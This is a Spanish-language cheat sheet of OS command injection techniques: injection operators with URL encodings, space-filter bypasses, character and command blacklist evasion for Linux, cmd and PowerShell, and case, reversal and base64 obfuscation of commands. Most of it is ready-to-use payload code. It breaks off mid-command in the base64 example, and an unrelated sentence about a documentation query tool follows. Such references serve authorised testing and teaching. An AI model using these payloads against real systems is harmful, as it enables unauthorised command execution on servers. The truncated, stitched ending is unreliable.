# Command injection ## Operadores de inyección
OperadorURL EncodeEjecución
;%3bAmbos
\n%0aAmbos
&%26Ambos (generalmente la salida del segundo comando se muestra primero)
|%7cAmbos (solo se muestra la salida del segundo comando)
&&%26%26Ambos (solo si el primer comando tiene éxito)
||%7c%7cSegundo comando (solo si el primer comando falla)
``%60%60Ambos (solo en Linux/Unix)
$()%24%28%29Ambos (solo en Linux/Unix)
## Evasión de filtros ### Bypass de filtro de espacio * Utilización de tabulador: `%09` * Uso de la variable de entorno de Linux/Unix: `${IFS}` * Bash brace expansion: `{ls,-la}` * [Payloads All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#bypass-without-space). ### Bypass de lista negra de caracteres * Uso de la variable de entorno. * Linux/Unix. * / = `${PATH:0:1}` * ; = `${LS_COLORS:10:1}` * Búsqueda de carácter en variables de entorno: `printenv | grep "{character}"` * Windows. ```sh # Símbolo del sistema (cmd) ## carácter \ echo %HOMEPATH% \Users\MrW0l05zyn echo %HOMEPATH:~6,-10% \ # PowerShell ## carácter \ $env:HOMEPATH[0] \ ## carácter espacio en blanco $env:PROGRAMFILES[10] (espacio en blanco) ## Obtener todas las variables de entorno Get-ChildItem Env: ``` * Cambio de carácter en Linux/Unix. ```sh # Carácter \ ## El carácter \ está en la posición 92 y ## antes está el carácter [ en la posición 91 man ascii echo $(tr '!-}' '"-~'<<<[) \ # Carácter ; ## El carácter ; está en la posición 59 y ## antes está el carácter : en la posición 58 man ascii echo $(tr '!-}' '"-~'<<<:) ; ``` ### Bypass de lista negra de comandos * Linux/Unix. ```shell # No mezclar el tipo de comillas y # la cantidad de comillas debe ser par w'h'o'am'i p'w'd i'd' w"h"o"am"i p"w"d i"d" # La cantidad de caracteres "especiales" no debe ser par who$@ami p$@wd i$@d w\ho\am\i p\wd i\d ``` * Windows. ```shell # Símbolo del sistema (cmd) who^ami # PowerShell ## no mezclar el tipo de comillas y ## la cantidad de comillas debe ser par w'h'o'am'i p'w'd w"h"o"am"i p"w"d ``` ### Ofuscación de comandos * Variaciones de mayúsculas y minúsculas. ```shell # Linux/Unix $(tr "[A-Z]" "[a-z]"<<<"WhOaMi") ## URL encode $(tr+"[A-Z]"+"[a-z]"<<<"WhOaMi") ## Utilización de tabulador %09 $(tr%09"[A-Z]"%09"[a-z]"<<<"WhOaMi") ## Uso de la variable de entorno ${IFS} $(tr${IFS}"[A-Z]"${IFS}"[a-z]"<<<"WhOaMi") # Windows ## Símbolo del sistema (cmd) WhOaMi ## PowerShell WhOaMi ``` * Comandos invertidos. ```shell # Linux/Unix echo 'whoami' | rev imaohw $(rev<<<'imaohw') # Windows ## PowerShell "whoami"[-1..-20] -join '' iex "$('imaohw'[-1..-20] -join '')" ``` * Comandos encodeados. ```shell # Linux/Unix echo -n 'whoami' | base64 d2hvYW1p bash<<<$(base64 -d<< ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.